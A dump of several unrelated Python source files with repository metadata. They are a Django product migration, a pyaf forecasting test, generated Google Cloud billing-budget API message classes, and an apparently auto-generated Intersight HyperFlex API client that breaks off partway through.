"[email protected]"
] | |
1f3e82b1570f82ea3bdfef2515882a87a08ed13e | 8efe9a6c9489d798b5f5b610eb531d86924a1548 | /src/products/migrations/0030_auto_20180305_0204.py | 5a7d07b9df8306b0e3108784bcba1e778c6e7200 | [] | no_license | MarekBiczysko/naklisze_public | e8e6f7e61cdb83b74ea68862b40c061c0253767b | e53c0e8fefffbcfc3a8859976eb7b81cf6270847 | refs/heads/master | 2022-12-12T02:27:09.824803 | 2019-07-23T10:54:47 | 2019-07-23T10:54:47 | 198,410,666 | 0 | 0 | null | 2022-12-08T01:03:08 | 2019-07-23T10:46:57 | Python | UTF-8 | Python | false | false | 1,518 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-05 01:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0029_auto_20180305_0150'),
]
operations = [
migrations.AlterField(
model_name='camera',
name='description',
field=models.TextField(default='\nA camera is an optical instrument for recording or capturing images, which may be stored locally, transmitted to another location, or both. The images may be individual still photographs or sequences of images constituting videos or movies. The camera is a remote sensing device as it senses subjects without any contact . The word camera comes from camera obscura, which means "dark chamber" and is the Latin name of the original device for projecting an image of external reality onto a flat surface. The modern photographic camera evolved from the camera obscura. The functioning of the camera is very similar to the functioning of the human eye. The first permanent photograph of a camera image was made in 1826 by Joseph Nicéphore Niépce.\n'),
),
migrations.AlterField(
model_name='camera',
name='spec_table',
field=models.TextField(blank=True, default="\nogniskowa @ 58 mm &\nkąt widzenia @ 32' szerokości &\nparametr @ wartość &\nkolejny parametr @ następna wartość &\n", max_length=300, null=True),
),
]
| [
"[email protected]"
] | |
edb41ced91b448c477e1ff798421c4a836d02c1c | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/artificial/transf_None/trend_Lag1Trend/cycle_5/ar_/test_artificial_128_None_Lag1Trend_5__0.py | a2712b0471685b35c3361d00197c36c4f8dea080 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 258 | py | import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 5, transform = "None", sigma = 0.0, exog_count = 0, ar_order = 0); | [
"[email protected]"
] | |
d1774ad51874a5675a3520841566cae2f5f090ea | ad5d38fce4785037c108186f17eb1c64380355ef | /sddsd/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/billingbudgets/v1/billingbudgets_v1_messages.py | 8a611f89deb6f766bb26aafda35e58789808ab8b | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | saranraju90/multik8s | 75864b605a139ddb7947ed4de4ae8466bdd49acb | 428576dedef7bb9cd6516e2c1ab2714581e1137c | refs/heads/master | 2023-03-03T21:56:14.383571 | 2021-02-20T14:56:42 | 2021-02-20T14:56:42 | 339,665,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,575 | py | """Generated message classes for billingbudgets version v1.
The Cloud Billing Budget API stores Cloud Billing budgets, which define a
budget plan and the rules to execute as spend is tracked against that plan.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
from apitools.base.py import extra_types
package = 'billingbudgets'
class BillingbudgetsBillingAccountsBudgetsCreateRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsCreateRequest object.
Fields:
googleCloudBillingBudgetsV1Budget: A GoogleCloudBillingBudgetsV1Budget
resource to be passed as the request body.
parent: Required. The name of the billing account to create the budget in.
Values are of the form `billingAccounts/{billingAccountId}`.
"""
googleCloudBillingBudgetsV1Budget = _messages.MessageField('GoogleCloudBillingBudgetsV1Budget', 1)
parent = _messages.StringField(2, required=True)
class BillingbudgetsBillingAccountsBudgetsDeleteRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsDeleteRequest object.
Fields:
name: Required. Name of the budget to delete. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
"""
name = _messages.StringField(1, required=True)
class BillingbudgetsBillingAccountsBudgetsGetRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsGetRequest object.
Fields:
name: Required. Name of budget to get. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
"""
name = _messages.StringField(1, required=True)
class BillingbudgetsBillingAccountsBudgetsListRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsListRequest object.
Fields:
pageSize: Optional. The maximum number of budgets to return per page. The
default and maximum value are 100.
pageToken: Optional. The value returned by the last `ListBudgetsResponse`
which indicates that this is a continuation of a prior `ListBudgets`
call, and that the system should return the next page of data.
parent: Required. Name of billing account to list budgets under. Values
are of the form `billingAccounts/{billingAccountId}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
parent = _messages.StringField(3, required=True)
class BillingbudgetsBillingAccountsBudgetsPatchRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsPatchRequest object.
Fields:
googleCloudBillingBudgetsV1Budget: A GoogleCloudBillingBudgetsV1Budget
resource to be passed as the request body.
name: Output only. Resource name of the budget. The resource name implies
the scope of a budget. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
updateMask: Optional. Indicates which fields in the provided budget to
update. Read-only fields (such as `name`) cannot be changed. If this is
not provided, then only fields with non-default values from the request
are updated. See https://developers.google.com/protocol-
buffers/docs/proto3#default for more details about default values.
"""
googleCloudBillingBudgetsV1Budget = _messages.MessageField('GoogleCloudBillingBudgetsV1Budget', 1)
name = _messages.StringField(2, required=True)
updateMask = _messages.StringField(3)
class GoogleCloudBillingBudgetsV1Budget(_messages.Message):
r"""A budget is a plan that describes what you expect to spend on Cloud
projects, plus the rules to execute as spend is tracked against that plan,
(for example, send an alert when 90% of the target spend is met). Currently
all plans are monthly budgets so the usage period(s) tracked are implied
(calendar months of usage back-to-back).
Fields:
amount: Required. Budgeted amount.
budgetFilter: Optional. Filters that define which resources are used to
compute the actual spend against the budget.
displayName: User data for display name in UI. The name must be less than
or equal to 60 characters.
etag: Optional. Etag to validate that the object is unchanged for a read-
modify-write operation. An empty etag will cause an update to overwrite
other changes.
name: Output only. Resource name of the budget. The resource name implies
the scope of a budget. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
notificationsRule: Optional. Rules to apply to notifications sent based on
budget spend and thresholds.
thresholdRules: Optional. Rules that trigger alerts (notifications of
thresholds being crossed) when spend exceeds the specified percentages
of the budget.
"""
amount = _messages.MessageField('GoogleCloudBillingBudgetsV1BudgetAmount', 1)
budgetFilter = _messages.MessageField('GoogleCloudBillingBudgetsV1Filter', 2)
displayName = _messages.StringField(3)
etag = _messages.StringField(4)
name = _messages.StringField(5)
notificationsRule = _messages.MessageField('GoogleCloudBillingBudgetsV1NotificationsRule', 6)
thresholdRules = _messages.MessageField('GoogleCloudBillingBudgetsV1ThresholdRule', 7, repeated=True)
class GoogleCloudBillingBudgetsV1BudgetAmount(_messages.Message):
r"""The budgeted amount for each usage period.
Fields:
lastPeriodAmount: Use the last period's actual spend as the budget for the
present period.
specifiedAmount: A specified amount to use as the budget. `currency_code`
is optional. If specified when creating a budget, it must match the
currency of the billing account. If specified when updating a budget, it
must match the currency_code of the existing budget. The `currency_code`
is provided on output.
"""
lastPeriodAmount = _messages.MessageField('GoogleCloudBillingBudgetsV1LastPeriodAmount', 1)
specifiedAmount = _messages.MessageField('GoogleTypeMoney', 2)
class GoogleCloudBillingBudgetsV1Filter(_messages.Message):
r"""A filter for a budget, limiting the scope of the cost to calculate.
Enums:
CreditTypesTreatmentValueValuesEnum: Optional. If not set, default
behavior is `INCLUDE_ALL_CREDITS`.
Messages:
LabelsValue: Optional. A single label and value pair specifying that usage
from only this set of labeled resources should be included in the
budget. Currently, multiple entries or multiple values per entry are not
allowed. If omitted, the report will include all labeled and unlabeled
usage.
Fields:
creditTypes: Optional. If Filter.credit_types_treatment is
INCLUDE_SPECIFIED_CREDITS, this is a list of credit types to be
subtracted from gross cost to determine the spend for threshold
calculations. If Filter.credit_types_treatment is **not**
INCLUDE_SPECIFIED_CREDITS, this field must be empty. See [a list of
acceptable credit type
values](https://cloud.google.com/billing/docs/how-to/export-data-
bigquery-tables#credits-type).
creditTypesTreatment: Optional. If not set, default behavior is
`INCLUDE_ALL_CREDITS`.
labels: Optional. A single label and value pair specifying that usage from
only this set of labeled resources should be included in the budget.
Currently, multiple entries or multiple values per entry are not
allowed. If omitted, the report will include all labeled and unlabeled
usage.
projects: Optional. A set of projects of the form `projects/{project}`,
specifying that usage from only this set of projects should be included
in the budget. If omitted, the report will include all usage for the
billing account, regardless of which project the usage occurred on. Only
zero or one project can be specified currently.
services: Optional. A set of services of the form `services/{service_id}`,
specifying that usage from only this set of services should be included
in the budget. If omitted, the report will include usage for all the
services. The service names are available through the Catalog API:
https://cloud.google.com/billing/v1/how-tos/catalog-api.
subaccounts: Optional. A set of subaccounts of the form
`billingAccounts/{account_id}`, specifying that usage from only this set
of subaccounts should be included in the budget. If a subaccount is set
to the name of the parent account, usage from the parent account will be
included. If the field is omitted, the report will include usage from
the parent account and all subaccounts, if they exist.
"""
class CreditTypesTreatmentValueValuesEnum(_messages.Enum):
r"""Optional. If not set, default behavior is `INCLUDE_ALL_CREDITS`.
Values:
CREDIT_TYPES_TREATMENT_UNSPECIFIED: This is an invalid value.
INCLUDE_ALL_CREDITS: All types of credit are subtracted from the gross
cost to determine the spend for threshold calculations.
EXCLUDE_ALL_CREDITS: All types of credit are added to the net cost to
determine the spend for threshold calculations.
INCLUDE_SPECIFIED_CREDITS: Credit types specified in the credit_types
field are subtracted from the gross cost to determine the spend for
threshold calculations.
"""
CREDIT_TYPES_TREATMENT_UNSPECIFIED = 0
INCLUDE_ALL_CREDITS = 1
EXCLUDE_ALL_CREDITS = 2
INCLUDE_SPECIFIED_CREDITS = 3
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""Optional. A single label and value pair specifying that usage from
only this set of labeled resources should be included in the budget.
Currently, multiple entries or multiple values per entry are not allowed.
If omitted, the report will include all labeled and unlabeled usage.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2, repeated=True)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
creditTypes = _messages.StringField(1, repeated=True)
creditTypesTreatment = _messages.EnumField('CreditTypesTreatmentValueValuesEnum', 2)
labels = _messages.MessageField('LabelsValue', 3)
projects = _messages.StringField(4, repeated=True)
services = _messages.StringField(5, repeated=True)
subaccounts = _messages.StringField(6, repeated=True)
class GoogleCloudBillingBudgetsV1LastPeriodAmount(_messages.Message):
r"""Describes a budget amount targeted to last period's spend. At this time,
the amount is automatically 100% of last period's spend; that is, there are
no other options yet. Future configuration will be described here (for
example, configuring a percentage of last period's spend).
"""
class GoogleCloudBillingBudgetsV1ListBudgetsResponse(_messages.Message):
r"""Response for ListBudgets
Fields:
budgets: List of the budgets owned by the requested billing account.
nextPageToken: If not empty, indicates that there may be more budgets that
match the request; this value should be passed in a new
`ListBudgetsRequest`.
"""
budgets = _messages.MessageField('GoogleCloudBillingBudgetsV1Budget', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class GoogleCloudBillingBudgetsV1NotificationsRule(_messages.Message):
r"""NotificationsRule defines notifications that are sent based on budget
spend and thresholds.
Fields:
disableDefaultIamRecipients: Optional. When set to true, disables default
notifications sent when a threshold is exceeded. Default notifications
are sent to those with Billing Account Administrator and Billing Account
User IAM roles for the target account.
monitoringNotificationChannels: Optional. Targets to send notifications to
when a threshold is exceeded. This is in addition to default recipients
who have billing account IAM roles. The value is the full REST resource
name of a monitoring notification channel with the form
`projects/{project_id}/notificationChannels/{channel_id}`. A maximum of
5 channels are allowed. See https://cloud.google.com/billing/docs/how-
to/budgets-notification-recipients for more details.
pubsubTopic: Optional. The name of the Pub/Sub topic where budget related
messages will be published, in the form
`projects/{project_id}/topics/{topic_id}`. Updates are sent at regular
intervals to the topic. The topic needs to be created before the budget
is created; see https://cloud.google.com/billing/docs/how-
to/budgets#manage-notifications for more details. Caller is expected to
have `pubsub.topics.setIamPolicy` permission on the topic when it's set
for a budget, otherwise, the API call will fail with PERMISSION_DENIED.
See https://cloud.google.com/billing/docs/how-to/budgets-programmatic-
notifications for more details on Pub/Sub roles and permissions.
schemaVersion: Optional. Required when NotificationsRule.pubsub_topic is
set. The schema version of the notification sent to
NotificationsRule.pubsub_topic. Only "1.0" is accepted. It represents
the JSON schema as defined in https://cloud.google.com/billing/docs/how-
to/budgets-programmatic-notifications#notification_format.
"""
disableDefaultIamRecipients = _messages.BooleanField(1)
monitoringNotificationChannels = _messages.StringField(2, repeated=True)
pubsubTopic = _messages.StringField(3)
schemaVersion = _messages.StringField(4)
class GoogleCloudBillingBudgetsV1ThresholdRule(_messages.Message):
r"""ThresholdRule contains a definition of a threshold which triggers an
alert (a notification of a threshold being crossed) to be sent when spend
goes above the specified amount. Alerts are automatically e-mailed to users
with the Billing Account Administrator role or the Billing Account User
role. The thresholds here have no effect on notifications sent to anything
configured under `Budget.all_updates_rule`.
Enums:
SpendBasisValueValuesEnum: Optional. The type of basis used to determine
if spend has passed the threshold. Behavior defaults to CURRENT_SPEND if
not set.
Fields:
spendBasis: Optional. The type of basis used to determine if spend has
passed the threshold. Behavior defaults to CURRENT_SPEND if not set.
thresholdPercent: Required. Send an alert when this threshold is exceeded.
This is a 1.0-based percentage, so 0.5 = 50%. Validation: non-negative
number.
"""
class SpendBasisValueValuesEnum(_messages.Enum):
r"""Optional. The type of basis used to determine if spend has passed the
threshold. Behavior defaults to CURRENT_SPEND if not set.
Values:
BASIS_UNSPECIFIED: Unspecified threshold basis.
CURRENT_SPEND: Use current spend as the basis for comparison against the
threshold.
FORECASTED_SPEND: Use forecasted spend for the period as the basis for
comparison against the threshold.
"""
BASIS_UNSPECIFIED = 0
CURRENT_SPEND = 1
FORECASTED_SPEND = 2
spendBasis = _messages.EnumField('SpendBasisValueValuesEnum', 1)
thresholdPercent = _messages.FloatField(2)
class GoogleProtobufEmpty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo { rpc
Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON
representation for `Empty` is empty JSON object `{}`.
"""
class GoogleTypeMoney(_messages.Message):
r"""Represents an amount of money with its currency type.
Fields:
currencyCode: The three-letter currency code defined in ISO 4217.
nanos: Number of nano (10^-9) units of the amount. The value must be
between -999,999,999 and +999,999,999 inclusive. If `units` is positive,
`nanos` must be positive or zero. If `units` is zero, `nanos` can be
positive, zero, or negative. If `units` is negative, `nanos` must be
negative or zero. For example $-1.75 is represented as `units`=-1 and
`nanos`=-750,000,000.
units: The whole units of the amount. For example if `currencyCode` is
`"USD"`, then 1 unit is one US dollar.
"""
currencyCode = _messages.StringField(1)
nanos = _messages.IntegerField(2, variant=_messages.Variant.INT32)
units = _messages.IntegerField(3)
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default='json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
| [
"[email protected]"
] | |
0482372da6150f93732ef9dbfe0fc9cd5bd63da0 | 0d49ae2184f2e88e4aefb423ae36578b8931e415 | /intersight/apis/hyperflex_sys_config_policy_api.py | 80f2f896c2898755c1e83ad7cac5bbd4a96f156e | [
"Apache-2.0"
] | permissive | sonogong777/intersight-python | 0477c7e96cdd81e1e30a188d74948b5db4e41b04 | af45333b23b0048029aeafcb0077f1d0a6ffe105 | refs/heads/master | 2021-04-30T03:29:46.680831 | 2018-02-12T20:22:10 | 2018-02-12T20:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,729 | py | # coding: utf-8
"""
UCS Starship API
This is the UCS Starship REST API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class HyperflexSysConfigPolicyApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def hyperflex_sys_config_policies_get(self, **kwargs):
"""
List of hyperflexSysConfigPolicies
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param bool count: The $count query option allows clients to request a count of the matching resources.
:param bool inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response
:param bool tags: The 'tags' query option allows clients to request a document with tag usage summary.
:param int top: The max number of records to return
:param int skip: The number of records to skip
:param str filter: Filter criteria for records to return. A URI with a $filter System Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in $filter operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section. Query examples: $filter=Name eq 'Bob' $filter=Tags/any(t: t/Key eq 'Site') $filter=Tags/any(t: t/Key eq 'Site' and t/Value eq 'London')
:param str select: Specifies a subset of properties to return
:param str orderby: Determines what values are used to order a collection of records
:param str expand: Specify additional attributes or related records to return. Supports only 'DisplayNames' attribute now. Query examples: $expand=DisplayNames
:return: HyperflexSysConfigPolicyList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_get_with_http_info(**kwargs)
else:
(data) = self.hyperflex_sys_config_policies_get_with_http_info(**kwargs)
return data
def hyperflex_sys_config_policies_get_with_http_info(self, **kwargs):
"""
List of hyperflexSysConfigPolicies
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param bool count: The $count query option allows clients to request a count of the matching resources.
:param bool inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response
:param bool tags: The 'tags' query option allows clients to request a document with tag usage summary.
:param int top: The max number of records to return
:param int skip: The number of records to skip
:param str filter: Filter criteria for records to return. A URI with a $filter System Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in $filter operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section. Query examples: $filter=Name eq 'Bob' $filter=Tags/any(t: t/Key eq 'Site') $filter=Tags/any(t: t/Key eq 'Site' and t/Value eq 'London')
:param str select: Specifies a subset of properties to return
:param str orderby: Determines what values are used to order a collection of records
:param str expand: Specify additional attributes or related records to return. Supports only 'DisplayNames' attribute now. Query examples: $expand=DisplayNames
:return: HyperflexSysConfigPolicyList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['count', 'inlinecount', 'tags', 'top', 'skip', 'filter', 'select', 'orderby', 'expand']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'count' in params:
query_params.append(('$count', params['count']))
if 'inlinecount' in params:
query_params.append(('$inlinecount', params['inlinecount']))
if 'tags' in params:
query_params.append(('tags', params['tags']))
if 'top' in params:
query_params.append(('$top', params['top']))
if 'skip' in params:
query_params.append(('$skip', params['skip']))
if 'filter' in params:
query_params.append(('$filter', params['filter']))
if 'select' in params:
query_params.append(('$select', params['select']))
if 'orderby' in params:
query_params.append(('$orderby', params['orderby']))
if 'expand' in params:
query_params.append(('$expand', params['expand']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HyperflexSysConfigPolicyList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def hyperflex_sys_config_policies_moid_delete(self, moid, **kwargs):
"""
Delete an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_delete(moid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_moid_delete_with_http_info(moid, **kwargs)
else:
(data) = self.hyperflex_sys_config_policies_moid_delete_with_http_info(moid, **kwargs)
return data
def hyperflex_sys_config_policies_moid_delete_with_http_info(self, moid, **kwargs):
"""
Delete an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_delete_with_http_info(moid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['moid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_moid_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'moid' is set
if ('moid' not in params) or (params['moid'] is None):
raise ValueError("Missing the required parameter `moid` when calling `hyperflex_sys_config_policies_moid_delete`")
collection_formats = {}
path_params = {}
if 'moid' in params:
path_params['moid'] = params['moid']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies/{moid}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def hyperflex_sys_config_policies_moid_get(self, moid, **kwargs):
"""
A instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_get(moid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:return: HyperflexSysConfigPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_moid_get_with_http_info(moid, **kwargs)
else:
(data) = self.hyperflex_sys_config_policies_moid_get_with_http_info(moid, **kwargs)
return data
def hyperflex_sys_config_policies_moid_get_with_http_info(self, moid, **kwargs):
"""
A instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_get_with_http_info(moid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:return: HyperflexSysConfigPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['moid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_moid_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'moid' is set
if ('moid' not in params) or (params['moid'] is None):
raise ValueError("Missing the required parameter `moid` when calling `hyperflex_sys_config_policies_moid_get`")
collection_formats = {}
path_params = {}
if 'moid' in params:
path_params['moid'] = params['moid']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies/{moid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HyperflexSysConfigPolicy',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def hyperflex_sys_config_policies_moid_patch(self, moid, body, **kwargs):
"""
Update an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_patch(moid, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str moid: The moid of the hyperflexSysConfigPolicy instance. (required)
:param HyperflexSysConfigPolicy body: hyperflexSysConfigPolicy to update (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_moid_patch_with_http_info(moid, body, **kwargs)
else:
(data) = self.hyperflex_sys_config_policies_moid_patch_with_http_info(moid, body, **kwargs)
return data
def hyperflex_sys_config_policies_moid_patch_with_http_info(self, moid, body, **kwargs):
"""
Update an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
